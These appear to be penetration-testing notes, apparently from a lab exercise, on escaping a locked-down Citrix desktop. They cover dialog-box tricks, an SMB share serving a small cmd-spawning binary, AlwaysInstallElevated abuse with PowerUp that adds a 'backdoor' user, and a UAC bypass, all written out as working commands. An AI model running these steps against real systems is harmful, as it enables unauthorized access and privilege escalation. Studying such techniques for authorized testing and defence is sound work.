Citrix Breakout

Install Citrix Receiver

Install, Uninstall, and Update | Citrix Workspace™ app for Linuxdocs.citrix.com

Download Debian package

Citrix Workspace app 2508.10 for Linux - CitrixCitrix.com

osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb
osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb

If "Network data corrupted - HDX has detected corrupted server data, session can not continue":

Use an older Citrix receiver version:

$ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb
$ sudo chmod 644 icaclient_23.5.0.58_amd64.deb
$ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb

Citrix ICAclient HDX has detected corrupted server data session can not continueAsk Ubuntu

Breakout

Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print, usually provide an attacker with an opportunity to invoke a Windows dialog box. There are multiple ways to open dialog box in windows using tools such as Paint, Notepad, Wordpad, etc.

With Paint

Run Paint from start menu and click on File > Open to open the Dialog Box.

With the windows dialog box open for paint, we can enter the UNC path \\127.0.0.1\c$\users\pmorgan under the File name field, with File-Type set to All Files and upon hitting enter we gain access to the desired directory.

Create .bat file

HTB Endgame: XEN0xdf hacks stuff

Accessing SMB share from restricted environment

smbserver.py -smb2support share $(pwd)

Right-click on the pwn.exe binary and select Open, which should prompt us to run it and a cmd console will be opened.

pwn.exe:

#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}

Explorer++ - A small and fast file manager for Windowsexplorerplusplus.com

Explorer++ to copy files from the \\10.13.38.95\share location to the Desktop belonging to the user pmorgan.

Being a portable application, it can be executed directly without the need for installation

Alternate Registry Editors

Alternative Registry editors can be employed to bypass the standard group policy restrictions. Simpleregedit, Uberregedit and SmallRegistryEditor are examples of such GUI tools

Modify existing shortcut file

C:\Windows\System32\cmd.exe

Other options: transfer an existing shortcut file using an SMB server. Alternatively, we can create a new shortcut file using PowerShell

Script Execution

1. Create a new text file and name it "evil.bat".

2. Open "evil.bat" with a text editor such as Notepad.

3. Input the command "cmd" into the file.

Escalating Privileges

WinPeas or PowerUp -> AlwaysInstallElevated

Miscellaneous Techniques

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1


C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
		AlwaysInstallElevated    REG_DWORD    0x1

PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI
	
Output Path
-----------
UserAdd.msi

C:\> runas /user:backdoor cmd

Enter the password for backdoor: T3st@123
Attempting to start cmd as user "VDESKTOP3\backdoor" ...

Bypass UAC

C:\Windows\system32> cd C:\Users\Administrator

Access is denied.

PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1
PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep